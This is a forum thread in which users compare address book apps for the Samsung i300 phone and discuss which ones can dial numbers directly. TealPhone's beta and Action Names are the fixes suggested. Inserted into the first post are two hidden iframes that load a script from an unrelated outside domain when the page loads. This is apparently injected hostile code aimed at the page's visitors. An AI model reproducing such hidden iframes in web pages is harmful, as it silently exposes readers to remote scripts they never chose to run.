+ Reply to Thread

Question Better Address Mgmt app ?

Did anyone find a better Address Book application than the default one that has the ability to dial phone numbers from within the address book ?

I tried Address Pro,Action Names and Address Plus . All are better (in terms of sorting,categorising,editing,integration with DataeBook/toDo list etc) than the default Address app that comes with I300, but they dont have the ability to dial from within the address view.

Also Address Plus crashes the device with Fatal Errors intermittantly.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Beams from above...
    I have really liked TealPhone, but it will not dial from the phone listing. A user forum on Teal's website indicated that they were waiting for Samsung or Sprint to release a developer's kit so the application could be modified to include the dialer.

John

(Click a sponser today!)

Lightbulb Better Address Mgmt

Paul Taylor at AddressPlus told me recently that he's working with Samsung to try and rectify the problem and allow direct dialing. Keep checking his website.
    Gary

Re: Better Address Mgmt

Originally posted by gpetty46
    Paul Taylor at AddressPlus told me recently that he's working with Samsung to try and rectify the problem and allow direct dialing. Keep checking his website.
    ...and that website address it?

:p

(Click a sponser today!)
    OOPS, Sorry. www.addressplus.net AddressPlus is offered by www.palmgear.com or you may contact Paul directly at ptaylor@addressplus.net
    Gary

Thank you!!

Understood from iambic/forum that ActionNames developers are waiting for information from Samsung for incorporating dialing from within Address view..

Integrated dialing in Action Names 5.1 works with I300 You have to just press on the phone number on the Contact list for couple of seconds. It then brings up a menu where 'dial' is one of the options , press dial and it brings up the list of phone numbers associated with that contact, choose one and Dial again...

Althought not straightforward, it solves my problem..Maybe it will get better in future releases.

I have always been a fan of TealPhone (www.tealpoint.com) since I first had my palm III and they recently release a beta version (3.52 is the current version, v3.55 is the beta and it' status is listed as "pending Final Testing") that supports dialing on i300.

I have been running the Beta for a couple of days now and haven't run into any problems...

If you decide to try the beta (www.tealpoint.com/beta/tealphon.zip) before the final release , the doc for the beta hasn't been updated so once installed you have to go to the menu, Action, Dialing Connection... and under the 'Driver' section you will see a selection for 'Samsung i300' that you will have to select before dialing works through TealPhone.

With the 'Dial on hardware button hold' and 'Convert letters to numbers' selected, I now use it exclusively and no longer access the standard address book at all.

It even comes with it's own dial pad, which has the novelty of being able to dial by name or company by spelling it on the number pad. Other than that though, the number pad kinda sticks.

My two cents.

Danny